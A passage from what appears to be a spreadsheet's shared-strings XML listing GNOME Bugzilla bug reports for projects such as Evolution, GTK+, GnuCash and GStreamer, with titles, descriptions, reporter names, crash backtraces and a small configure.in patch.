    <t>marten</t>
  </si>
  <si>
    <t>GTK+-507000</t>
  </si>
  <si>
    <t>Avoid some compiler warnings.</t>
  </si>
  <si>
    <t>Some self-contained result from my extended-layout rework:
This patch avoids some compiler warnings in gtkbuilder.c and gtkbuilder.c.</t>
  </si>
  <si>
    <t>EVOLUTION-227000</t>
  </si>
  <si>
    <t>auto completion for addresses does not complete for email address only name</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Minor
Version: 1.0.7.99
Synopsis: auto completion for addresses does not complete for email address only name
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
when composing an email auto completion doesn't work for the actual
email address.  if i type a name suggestions appear but if i ignore
that and just hit tab it will still auto complete.  if i type part of
an email address and ignore the suggestion and hit tab it won't.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>mkrisch</t>
  </si>
  <si>
    <t>GTK+-479197</t>
  </si>
  <si>
    <t>Tries to search with tracker while it is uninstalled</t>
  </si>
  <si>
    <t>The GTK+ search engine features the same bug as nautilus' #386521. When libtracker is installed but tracker itself is not it will use it regardless. The only check which is made is a tracker_connect which just connects to the session bus not to tracker itself.</t>
  </si>
  <si>
    <t>DEVHELP-409182</t>
  </si>
  <si>
    <t>devhelp should allow --focus-search option</t>
  </si>
  <si>
    <t>it would be sweet if devhelp had an option for --focus-search that did nothing other than raise the devhelp window and focus the search box (so that you can immediately begin typing)
you could then bind this to a metacity keyboard shortcut.</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER-433782</t>
  </si>
  <si>
    <t>Optimise vCard folding</t>
  </si>
  <si>
    <t>Please describe the problem:
It takes a very long time to add a large picture to a contact. The processor time is mostly spent on folding lines in e-vcard.c.
I've optimised the folding and created a patch. Please someone have a look at it especially with regard to utf-8 correctness.
The speedup on my system is in the range 10x-100x. This problem is closely related to bug #312581 but is most easily tracked as separate bugs.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>oystein</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER-524324</t>
  </si>
  <si>
    <t>Critical runtime warning assertion `priv-&gt;listeners != CORBA_OBJECT_NIL' failed</t>
  </si>
  <si>
    <t>I noticed this critical warning on eds console just by chance:
(evolution-data-server-2.22:26122): libedata-cal-CRITICAL **: e_data_cal_view_notify_objects_modified_1: assertion `priv-&gt;listeners != CORBA_OBJECT_NIL' failed
steps:
1) evolution --force-shutdown
2) run eds on its own console
3) evolution
4) go to calendar and edit one event (say on file backend) - notice no warning
   on the eds console
5) close evolution - notice eds kept running which is right
6) repeat step 3) and 4) but see the warning(s) on the console
Seems something is broken there.</t>
  </si>
  <si>
    <t>GNUCASH-475582</t>
  </si>
  <si>
    <t>Windows</t>
  </si>
  <si>
    <t>When opening a file saved with 2.0.2 and/or 2.0.5 gnucash crashes.</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Open gnucash
2. Open file
3. 
Stack trace:
   1.
      Program received signal SIGSEGV Segmentation fault.
   2.
      0x77c478c0 in strlen () from C:\WINDOWS\system32\msvcrt.dll
   3.
      (gdb) bt
   4.
      #0  0x77c478c0 in strlen () from C:\WINDOWS\system32\msvcrt.dll
   5.
      #1  0x6730c793 in _libmsvcrt_a_iname ()
   6.
         from C:\Program Files\gnucash\bin\libglib-2.0-0.dll
   7.
      #2  0x00000000 in ?? () from
   8.
      #3  0x622fc140 in _FUNCTION__.15 ()
   9.
      #4  0x00000001 in ?? ()
  10.
      #5  0xffffffff in ?? ()
  11.
      #6  0x00000040 in ?? ()
  12.
      #7  0x00000006 in ?? ()
  13.
      #8  0x0022e528 in ?? ()
  14.
      #9  0x6730c3b0 in _libmsvcrt_a_iname ()
  15.
         from C:\Program Files\gnucash\bin\libglib-2.0-0.dll
  16.
      #10 0x0022ea54 in ?? ()
  17.
      #11 0x0022e260 in ?? ()
  18.
      #12 0x6c393025 in ?? ()
  19.
      #13 0x7c940064 in ntdll!RtlInsertElementGenericTableAvl () from ntdll.dll
  20.
      #14 0x02197ea8 in ?? ()
  21.
      #15 0x000000b8 in ?? ()
  22.
      #16 0xfeeefeee in ?? ()
  23.
      #17 0x010b0000 in ?? ()
  24.
      #18 0x02197e40 in ?? ()
  25.
      #19 0x00000000 in ?? () from
  26.
      #20 0x0022e30c in ?? ()
  27.
      ---Type  to continue or q  to quit---
Other information:
This behavior happens on 2 separate Windows XP Pro machines.  I have been attempting to produce a more meaningful stack trace but cannot find the relevant dll for 0x01 in mmp.  
I can create and open a new file fine but my file does not work.  I have been unable to get 2.2.x to compile on *nix so I don't know if this is something with Windows or something with my file.</t>
  </si>
  <si>
    <t>andi5.py</t>
  </si>
  <si>
    <t>wesleyharp</t>
  </si>
  <si>
    <t>EVINCE-357526</t>
  </si>
  <si>
    <t>evince unmaximises when reloading</t>
  </si>
  <si>
    <t>Please describe the problem:
I like to use the vertical maximise feature of my window manager (metacity - I have a key binding set up to trigger the maximise).  However when I reload a document with Ctrl-R in a verically maximised evince window it always unmaximises. (This does not happen with an ordinary maximised window only a vertically maximised one).  The same behavior is present in versions 0.5.3 and 0.6.0 of evince.
Steps to reproduce:
1. Open any pdf document in evince.
2. Vertically maximise the evince window
3. Press Ctrl-R
Actual results:
The window unmaximises.
Expected results:
Evince should reload the document without changing the shape of the window.
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>PYGTK-157571</t>
  </si>
  <si>
    <t>GdkEventExpose.area cannot be assigned</t>
  </si>
  <si>
    <t>&gt;&gt;&gt; import gtk
&gt;&gt;&gt; e = gtk.gdk.Event(gtk.gdk.EXPOSE)
&gt;&gt;&gt; r = gtk.gdk.Rectangle()
&gt;&gt;&gt; r.x = 1
&gt;&gt;&gt; e.area = r
Traceback (most recent call last):
  File  line 1 in ?
AttributeError: 'gtk.gdk.Event' object has no attribute 'area'</t>
  </si>
  <si>
    <t>rubensr</t>
  </si>
  <si>
    <t>GOSSIP-414891</t>
  </si>
  <si>
    <t>Group header background does not work nicely with dark themes</t>
  </si>
  <si>
    <t>I just tested darkilouche (http://jimmac.musichall.cz/weblog.php/Artwork/Darkilouche.php) and the group header background is nearly the same color as the normal background.
Is it hardcoded?</t>
  </si>
  <si>
    <t>EVOLUTION-229904</t>
  </si>
  <si>
    <t>problem with select names entries.</t>
  </si>
  <si>
    <t>Create new msg
type in address of local list
once list name is in To: field double click on it.
The primary e-mail box has XML in it.
using evolution-1.1.0.99-snap.ximian.200209031002</t>
  </si>
  <si>
    <t>EVOLUTION-233592</t>
  </si>
  <si>
    <t>Upgraded to Evolution 1.2 from 1.0.8 now my contacts and tasks are GONE!</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Critical
Version: 1.2.0
Synopsis: Upgraded to Evolution 1.2 from 1.0.8 now my contacts and tasks are GONE!
Bugzilla-Product: Evolution
Bugzilla-Component: Contacts [was: Addressbook]
Description:
I upgraded from Evolution 1.0.8 to 1.2.0 using Red Carpet. When I
launched it for the first time it said it need to add some new items to
my folder. I said OK. Now when I click on contacts or tasks in the
shortcut bar or folder bar it says there are none. I checked folder
settings under the settings menu item and it says that contacts and
tasks are mapped to the right folder names in the local folder. HELP!!!
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>cushingw</t>
  </si>
  <si>
    <t>EVOLUTION-206220</t>
  </si>
  <si>
    <t>Calendar-Component crashes when changing Search options</t>
  </si>
  <si>
    <t>When you go to 'Calendar' hit 'Any field contains' and change it to
something else..
Oops! The view for evolution:/local/calendar has died unexpectedly.. etc</t>
  </si>
  <si>
    <t>m.kooiman</t>
  </si>
  <si>
    <t>EVOLUTION-319061</t>
  </si>
  <si>
    <t>Evolution crashes when entering an value for the until field of an recurring date</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. go into the calender view
2. create an date
3. go into the section for recurring dates
4. chosse every week 
5. chosse until
6. click  on the combobox displaying the current date as default value for until
Stack trace:
Other information:
I am not quite shure what should be displayed after clicking but if the plan
was to show the possible dates maybe it's just to many entries??? But i don't
know -  just a guess.</t>
  </si>
  <si>
    <t>TFojuth</t>
  </si>
  <si>
    <t>TOTEM-323783</t>
  </si>
  <si>
    <t>Thumbnailer</t>
  </si>
  <si>
    <t>PATCH: totem-video-thumbnailer generates thumbnails with alpha transparency</t>
  </si>
  <si>
    <t>Nautilus now assumes that when a thumbnail has alpha transparency it doesn't
need to draw a frame around the thumbnail. This breaks the thumbnails generated
by totem-video-thumbnailer. After opening a thumbnail in gimp and removing the
alpha channel using Layer-&gt;Transparency-&gt;Remove Alpha Channel i see no visible
changes.</t>
  </si>
  <si>
    <t>EVOLUTION-210875</t>
  </si>
  <si>
    <t>Need to have a way of auto-updating filters/vfolders when source url changes.</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Critical
Version: 0.14.99
Synopsis: evolution mail crashed after i typed my password
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
started evolution and entered my password into the password request dialog.
the mail component crashed immediately after i clicked ok . 
Debugging Information:
0x4096c8c9 in __wait4 () from /lib/libc.so.6
#0  0x4096c8c9 in __wait4 () from /lib/libc.so.6
#1  0x409cb1cc in ?? () from /lib/libc.so.6
#2  0x40653975 in waitpid (pid=27545 stat_loc=0xbfffe230 options=0)
    at wrapsyscall.c:134
#3  0x402d27ff in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x80928ce in segv_redirect (sig=11) at main.c:67
#5  0x40652532 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 0 
      esi = 137134600 ebp = 3221218236 esp = 3221218236 ebx = 0 edx = 0 
      ecx = 1084006657 eax = 0 trapno = 14 err = 6 eip = 134734961 
      cs = 35 __csh = 0 eflags = 2163270 esp_at_signal = 3221218236 
      ss = 43 __ssh = 0 fpstate = 0xbfffe340 oldmask = 2147483648 
      cr2 = 16}) at signals.c:96
#6  0x408f9c48 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#7  0x808a209 in pass_got (string=0x82ffe30 abscehrose  data=0x82c8208)
    at mail-mt.c:453
#8  0x402b21e8 in dialog_string_callback (mbox=0x83525d0 button=0 
    data=0x83abcc8) at gnome-dialog-util.c:393
#9  0x402b02e1 in gnome_dialog_marshal_signal_1 (object=0x83525d0 
    func=0x402b21a0  func_data=0x83abcc8 
    args=0xbfffe4b8) at gnome-dialog.c:145
#10 0x404a44d7 in gtk_handlers_run (handlers=0x80e9a10 signal=0xbfffe474 
    object=0x83525d0 params=0xbfffe4b8 after=0) at gtksignal.c:1917
#11 0x404a39af in gtk_signal_real_emit (object=0x83525d0 signal_id=90 
    params=0xbfffe4b8) at gtksignal.c:1477
#12 0x404a1c40 in gtk_signal_emit (object=0x83525d0 signal_id=90)
    at gtksignal.c:552
#13 0x402b19e8 in gnome_dialog_button_clicked (button=0x83a9798 
    dialog=0x83525d0) at gnome-dialog.c:1014
#14 0x40477c3f in gtk_marshal_NONE__NONE (object=0x83a9798 
    func=0x402b1904  func_data=0x83525d0 
    args=0xbfffe818) at gtkmarshal.c:312
#15 0x404a44d7 in gtk_handlers_run (handlers=0x80e9970 signal=0xbfffe7d4 
    object=0x83a9798 params=0xbfffe818 after=1) at gtksignal.c:1917
#16 0x404a3adf in gtk_signal_real_emit (object=0x83a9798 signal_id=93 
    params=0xbfffe818) at gtksignal.c:1516
#17 0x404a1c40 in gtk_signal_emit (object=0x83a9798 signal_id=93)
    at gtksignal.c:552
#18 0x404d67db in gtk_widget_activate (widget=0x83a9798) at gtkwidget.c:2890
#19 0x404dc0b6 in gtk_window_activate_default (window=0x83525d0)
    at gtkwindow.c:554
#20 0x40477c3f in gtk_marshal_NONE__NONE (object=0x83525d0 
    func=0x404dbfec  func_data=0x83a9c28 
    args=0xbfffeb80) at gtkmarshal.c:312
#21 0x404a44d7 in gtk_handlers_run (handlers=0x80e99b0 signal=0xbfffeb3c 
    object=0x83a9c28 params=0xbfffeb80 after=0) at gtksignal.c:1917
#22 0x404a39af in gtk_signal_real_emit (object=0x83a9c28 signal_id=99 
    params=0xbfffeb80) at gtksignal.c:1477
#23 0x404a1c40 in gtk_signal_emit (object=0x83a9c28 signal_id=99)
    at gtksignal.c:552
#24 0x404d67db in gtk_widget_activate (widget=0x83a9c28) at gtkwidget.c:2890
#25 0x4044e5cc in gtk_entry_key_press (widget=0x83a9c28 event=0x83ac9d8)
    at gtkentry.c:1210
#26 0x40477921 in gtk_marshal_BOOL__POINTER (object=0x83a9c28 
    func=0x4044e28c  func_data=0x0 args=0xbfffeee0)
    at gtkmarshal.c:28
#27 0x404a39e8 in gtk_signal_real_emit (object=0x83a9c28 signal_id=54 
    params=0xbfffeee0) at gtksignal.c:1492
#28 0x404a1c40 in gtk_signal_emit (object=0x83a9c28 signal_id=54)
    at gtksignal.c:552
#29 0x404d66ab in gtk_widget_event (widget=0x83a9c28 event=0x83ac9d8)
    at gtkwidget.c:2864
#30 0x404dd91c in gtk_window_key_press_event (widget=0x83525d0 
    event=0x83ac9d8) at gtkwindow.c:1255
#31 0x402b1ae3 in gnome_dialog_key_pressed (d=0x83525d0 e=0x83ac9d8)
    at gnome-dialog.c:1047
#32 0x40477921 in gtk_marshal_BOOL__POINTER (object=0x83525d0 
    func=0x402b1a18  func_data=0x0 args=0xbffff268)
    at gtkmarshal.c:28
#33 0x404a39e8 in gtk_signal_real_emit (object=0x83525d0 signal_id=54 
    params=0xbffff268) at gtksignal.c:1492
#34 0x404a1c40 in gtk_signal_emit (object=0x83525d0 signal_id=54)
    at gtksignal.c:552
#35 0x404d66ab in gtk_widget_event (widget=0x83525d0 event=0x83ac9d8)
    at gtkwidget.c:2864
#36 0x40477816 in gtk_propagate_event (widget=0x83525d0 event=0x83ac9d8)
    at gtkmain.c:1360
#37 0x40476b1a in gtk_main_do_event (event=0x83ac9d8) at gtkmain.c:818
#38 0x4052a392 in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff5ec user_data=0x0) at gdkevents.c:2139
#39 0x405599f6 in g_main_dispatch (dispatch_time=0xbffff5ec) at gmain.c:656
#40 0x40559fb1 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#41 0x4055a129 in g_main_run (loop=0x83a5418) at gmain.c:935
#42 0x4047648a in gtk_main () at gtkmain.c:524
#43 0x402b110e in gnome_dialog_run_real (dialog=0x83525d0 close_after=1)
    at gnome-dialog.c:663
#44 0x402b120e in gnome_dialog_run_and_close (dialog=0x83525d0)
    at gnome-dialog.c:730
#45 0x808a56d in do_get_pass (mm=0x82c8208) at mail-mt.c:547
#46 0x8089f43 in mail_msgport_received (source=0x812a070 cond=G_IO_IN 
    d=0x812a028) at mail-mt.c:310
#47 0x405584ba in g_io_unix_dispatch (source_data=0x812a088 
    current_time=0xbffff74c user_data=0x812a028) at giounix.c:135
#48 0x405599f6 in g_main_dispatch (dispatch_time=0xbffff74c) at gmain.c:656
#49 0x40559fb1 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#50 0x4055a129 in g_main_run (loop=0x80ef638) at gmain.c:935
#51 0x4047648a in gtk_main () at gtkmain.c:524
#52 0x40740082 in bonobo_main () at bonobo-main.c:283
#53 0x8092a2a in main (argc=3 argv=0xbffff914) at main.c:141
#0  0x4096c8c9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x409cb1cc in ?? () from /lib/libc.so.6
No symbol table info available.
#2  0x40653975 in waitpid (pid=27545 stat_loc=0xbfffe230 options=0)
    at wrapsyscall.c:134
stat_loc = (int *) 0xbfffe230
options = 0
result = 0
oldtype = 0
#3  0x402d27ff in gnome_segv_handle (signum=11) at gnome-init.c:659
estatus = 0
in_segv = 1
pid = 0
#4  0x80928ce in segv_redirect (sig=11) at main.c:67
67			gnome_segv_handler (sig)
sig = 11
#5  0x40652532 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 0 
      esi = 137134600 ebp = 3221218236 esp = 3221218236 ebx = 0 edx = 0 
      ecx = 1084006657 eax = 0 trapno = 14 err = 6 eip = 134734961 
      cs = 35 __csh = 0 eflags = 2163270 esp_at_signal = 3221218236 
      ss = 43 __ssh = 0 fpstate = 0xbfffe340 oldmask = 2147483648 
      cr2 = 16}) at signals.c:96
self = 0x40659920
in_sighandler = 0x0
#6  0x408f9c48 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#7  0x808a209 in pass_got (string=0x82ffe30 abscehrose  data=0x82c8208)
    at mail-mt.c:453
453				mail_config_service_set_save_passwd (service remember)
service = (MailConfigService *) 0x0
mca = (MailConfigAccount *) 0xfffffe00
remember = 0
string = 0xfffffe00 
m = (struct _pass_msg *) 0x82c8208
</t>
  </si>
  <si>
    <t>EVOLUTION-208491</t>
  </si>
  <si>
    <t>crash when asked new mail from pop-up menu</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.12.99
Synopsis: crash when asked new mail from pop-up menu
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
crash when asked new mail from pop-up menu
Debugging Information:
0x40973e69 in ?? ()
#0  0x40973e69 in ?? ()
#1  0x407e5323 in ?? ()
#2  0x402c52a6 in ?? ()
#3  0x407e307e in ?? ()
#4  
#5  0x4003e7a2 in ?? ()
#6  0x8066fb2 in ?? ()
#7  0x407a5673 in ?? ()
#8  0x406b70b3 in ?? ()
#9  0x407ab2d6 in ?? ()
#10 0x407ab49d in ?? ()
#11 0x4046d925 in ?? ()
#12 0x4049c577 in ?? ()
#13 0x4049a5ac in ?? ()
#14 0x407ad498 in ?? ()
#15 0x407b0e95 in ?? ()
#16 0x4046da03 in ?? ()
#17 0x4049d0d6 in ?? ()
#18 0x4049c537 in ?? ()
#19 0x4049a5ac in ?? ()
#20 0x404d1aac in ?? ()
#21 0x40475d4d in ?? ()
#22 0x40474fdd in ?? ()
#23 0x4046d7d9 in ?? ()
#24 0x4049c577 in ?? ()
#25 0x4049a5ac in ?? ()
#26 0x404d1978 in ?? ()
#27 0x4046d750 in ?? ()
#28 0x4046c90d in ?? ()
#29 0x4052612b in ?? ()
#30 0x40557055 in ?? ()
#31 0x40557659 in ?? ()
#32 0x405577e8 in ?? ()
#33 0x4046c213 in ?? ()
#34 0x406d7437 in ?? ()
#35 0x807a340 in ?? ()
#36 0x408d7f31 in ?? ()
#0  0x40973e69 in ?? ()
No symbol table info available.
#1  0x407e5323 in ?? ()
No symbol table info available.
#2  0x402c52a6 in ?? ()
No symbol table info available.
#3  0x407e307e in ?? ()
No symbol table info available.
#4  
No symbol table info available.
#5  0x4003e7a2 in ?? ()
No symbol table info available.
#6  0x8066fb2 in ?? ()
No symbol table info available.
#7  0x407a5673 in ?? ()
No symbol table info available.
Unknown reporter: liberati@physics.umd.edu changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>liberati</t>
  </si>
  <si>
    <t>YELP-349677</t>
  </si>
  <si>
    <t>manpage rendered wrong</t>
  </si>
  <si>
    <t>That bug has been opened on https://launchpad.net/distros/ubuntu/+source/yelp/+bug/50318
Yelp renders several manpages wrong. For example in the kill manpage the table of signals is rendered as floating text and the headings contain .B markers.
http://librarian.launchpad.net/3086771/scr.png
Screenshot of the kill manpage
...</t>
  </si>
  <si>
    <t>LIBWNCK-90029</t>
  </si>
  <si>
    <t>Workspace popup dimensions are funny</t>
  </si>
  <si>
    <t>I have 8 workspaces.
I used to have a 4x2 popup window but today it turned into a 1x8 popup. A
line of workspace windows going straight down.
Actually I do have my workspace switcher applet on a vertical panel such
that the switcher is a 2x4 grid. Maybe this is related?</t>
  </si>
  <si>
    <t>EVOLUTION-SCALIX-331336</t>
  </si>
  <si>
    <t>EVOLUTION-SCALIX</t>
  </si>
  <si>
    <t>configure.in needs evo-2.6 love</t>
  </si>
  <si>
    <t>The following sniplet is by no means a serious patch attempt just what I did to make it work for me and to point out the points that need patching.
diff -Nur evolution-scalix-10.0.0.337/configure.in evolution-scalix-10.0.0.337.new/configure.in
--- evolution-scalix-10.0.0.337/configure.in    2006-01-20 20:04:55.000000000 +0100
+++ evolution-scalix-10.0.0.337.new/configure.in        2006-02-15 23:25:12.000000000 +0100
@@ -307 +307 @@
 AC_DEFINE_UNQUOTED(SERVER_VERSION_REQ $SERVER_REQ [Minimal server version required])
 AC_MSG_CHECKING(Evolution version)
-EVOLUTION_VERSION=`pkg-config --modversion evolution-shell-2.2 2&gt;/dev/null`
+EVOLUTION_VERSION=`pkg-config --modversion evolution-shell-2.6 2&gt;/dev/null`
 if test -z $EVOLUTION_VERSION then
        dnl No 2.2 check for 2.4
@@ -469 +469 @@
                EDS_API_VERSION=1.2
        fi
 else
-       EVOLUTION_API_VERSION=2.2
+       EVOLUTION_API_VERSION=2.6
        EAPI_MAJOR_VERSION=2
-       EAPI_MINOR_VERSION=2
+       EAPI_MINOR_VERSION=6
        CAMEL_API_VERSION=1.2
        EDS_API_VERSION=1.2
 fi</t>
  </si>
  <si>
    <t>evolution-scalix-maint</t>
  </si>
  <si>
    <t>TOTEM-395159</t>
  </si>
  <si>
    <t>Tv-out -&gt; TV-out in Preferences</t>
  </si>
  <si>
    <t>The second two TV options say Tv-out (lowercase v) instead of TV-out on trunk.
Other information:
Candidate for gnome-love.</t>
  </si>
  <si>
    <t>EVOLUTION-246775</t>
  </si>
  <si>
    <t>can not set the categories item when creating a new contact</t>
  </si>
  <si>
    <t>Description of Problem:
can not set the categories item when creating a new contact
Steps to reproduce the problem:
1. Double Click one contact to open Contact editor
2. Click categories button
3. 
Actual Results:
   An error dialog with Category editor not available is shown and
sometimes the application will crash.
Expected Results:
How often does this happen? 
   always
Additional Information:</t>
  </si>
  <si>
    <t>ben.li</t>
  </si>
  <si>
    <t>GNOME-APPLETS-145340</t>
  </si>
  <si>
    <t>battery</t>
  </si>
  <si>
    <t>battstat leaks GC</t>
  </si>
  <si>
    <t>Found a leak with valgrind where a graphics context is leaked when removing the
applet. This patch looks like it fixes it.</t>
  </si>
  <si>
    <t>RHYTHMBOX-331740</t>
  </si>
  <si>
    <t>Highlight browsed Genre/Artist/Album</t>
  </si>
  <si>
    <t>When the user selects Browse Genre/Artist/Album the library browser should select that item in the browser (if it is visible).  i.e. if the Album is selected and viewable the browser should highlight that in the browser list.   Also it should restrict the browser view which is another special case of bug #322787.</t>
  </si>
  <si>
    <t>GNOME-UTILS-24633</t>
  </si>
  <si>
    <t>error</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnome-utils
Severity: normal
Version:  1.2.1
Synopsis: error
Class:    sw-bug
Distribution: Red Hat Linux release 6.2 (Zoot)
System: Linux 2.2.16-3 i686 unknown
C library: glibc-2.1.3-15
C compiler: egcs-2.91.66
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.10
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.1
Description:
I clicked on a color twice.
Debugging information:
0x405108e9 in __wait4 () from /lib/libc.so.6
#0  0x405108e9 in __wait4 () from /lib/libc.so.6
#1  0x4056f1ec in ?? () from /lib/libc.so.6
#2  0x40085131 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  0x4049dc68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#4  0x40435845 in glade_xml_destroy () from /usr/lib/libglade.so.0
#5  0x401c822d in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#6  0x401f4e3b in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#7  0x401f2f05 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#8  0x401d8b53 in gtk_object_shutdown () from /usr/lib/libgtk-1.2.so.0
#9  0x401d8afb in gtk_object_destroy () from /usr/lib/libgtk-1.2.so.0
#10 0x401daa0b in gtk_object_unref () from /usr/lib/libgtk-1.2.so.0
#11 0x404346fa in glade_xml_new () from /usr/lib/libglade.so.0
#12 0x805a63c in view_color_edit_new (mcg=0x81c1fc8) at view-color-edit.c:266
#13 0x80558df in mdi_color_generic_create_view (child=0x81c1fc8)
    at mdi-color-generic.c:241
#14 0x4008a702 in gnome_mdi_child_create_view () from /usr/lib/libgnomeui.so.32
#15 0x4008a53b in gnome_mdi_child_add_view () from /usr/lib/libgnomeui.so.32
#16 0x400887d0 in gnome_mdi_add_view () from /usr/lib/libgnomeui.so.32
#17 0x8053e16 in menu_edit (col=0x8117c10) at menus.c:597
#18 0x8052866 in actions (r=0 g=0 b=0 name=0x0 col=0x8117c10 
    type=ACTIONS_EDIT key=0) at gcolorsel.c:432
#19 0x8052a92 in actions_views (col=0x8117c10) at gcolorsel.c:485
#20 0x805bf60 in view_color_list_button_press (clist=0x80bf780 
    event=0x8100d34 vcl=0x80bb108) at view-color-list.c:411
#21 0x401c7df9 in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#22 0x401f59bd in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#23 0x401f4e02 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#24 0x401f2f05 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#25 0x4022831c in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#26 0x401c7d52 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#27 0x401c6faa in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#28 0x4027153b in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#29 0x403bc186 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#30 0x403bc751 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#31 0x403bc8f1 in g_main_run () from /usr/lib/libglib-1.2.so.0
#32 0x401c68e9 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#33 0x8052d20 in main (argc=1 argv=0xbffffa34) at gcolorsel.c:774
#0  0x405108e9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x4056f1ec in ?? () from /lib/libc.so.6
No symbol table info available.
#2  0x40085131 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  0x4049dc68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#4  0x40435845 in glade_xml_destroy () from /usr/lib/libglade.so.0
No symbol table info available.
#5  0x401c822d in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#6  0x401f4e3b in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#7  0x401f2f05 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-28 12:00 -------
This bug was previously known as bug 24633 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=24633
Originally filed under the gnome-utils product and general component.
Unknown version 1.2.x in product gnome-utils. Setting version to the default unspecified.
The original reporter (ellemo@worldonline.dk) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-utils-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>ellemo</t>
  </si>
  <si>
    <t>GNOME-CALCULATOR-163538</t>
  </si>
  <si>
    <t>Bkspc results in mal-formed expression</t>
  </si>
  <si>
    <t>- Launch gcalctool in basic mode.
- Click on digit '9'
- Click on '+/-'
- Parantheses appear around '9'. -(9)
- Click on 'Bksp'
I expected the parantheses to disappear but what i get is -(9 
which is a malformed expression. There is no way for me to undo the '+/-'
click expect for clearing the whole thing.</t>
  </si>
  <si>
    <t>sampie</t>
  </si>
  <si>
    <t>ringuva</t>
  </si>
  <si>
    <t>GLIB-138412</t>
  </si>
  <si>
    <t>[cygwin patch] URI conversion</t>
  </si>
  <si>
    <t>On Cygwin URI conversion (tests/uri-test) fails without this patch.  I'm not
exactly sure why but it does fix things up.</t>
  </si>
  <si>
    <t>EVOLUTION-235194</t>
  </si>
  <si>
    <t>The contact list name can be set to empty from minicard view</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
The contact-list name is prevent from empty if you create or edit it from
the contact-list-editor dialog. However you can just set the name field
empty from the minicard view and it really take effect. It is a bug though
some extent trivial
Steps to reproduce the problem:
1. open the contact and create a contact list
2. edit the minicard of that list and delete all the content in name field
3. 
Actual Results:
You will find the list name is really be set to be empty and if you open
the contact-list editor dialog the name field is still empty there.
Expected Results:
Evolution should detect that the name field is set empty or not. If so it
should give some warning and correct the mistake.
How often does this happen? 
Additional Information:</t>
  </si>
  <si>
    <t>sean.gao</t>
  </si>
  <si>
    <t>GSTREAMER-326720</t>
  </si>
  <si>
    <t>[alsasink] doesn't support more than 2 channels anymore</t>
  </si>
  <si>
    <t>I used to have this pipeline configured as my audio-sink with 0.8:
audioconvert ! audioscale ! audio/x-raw-intchannels=6rate=48000 ! alsasink
As the audioscale got renamed I use audioresample now:
audioconvert ! audioresample ! audio/x-raw-intchannels=6rate=48000 ! alsasink
But this pipeline doen't want to play I need to change it to this for playing:
audioconvert ! audioresample ! audio/x-raw-intrate=48000 ! alsasink
But - of course - now I don't get any audio from the center and rear boxes as well as my sub.</t>
  </si>
  <si>
    <t>GSTREAMER-331909</t>
  </si>
  <si>
    <t>support for more fourccs in qtdemux</t>
  </si>
  <si>
    <t>qtdemux could support more mov files by adding some more fourcc
entries.</t>
  </si>
  <si>
    <t>GTK+-79162</t>
  </si>
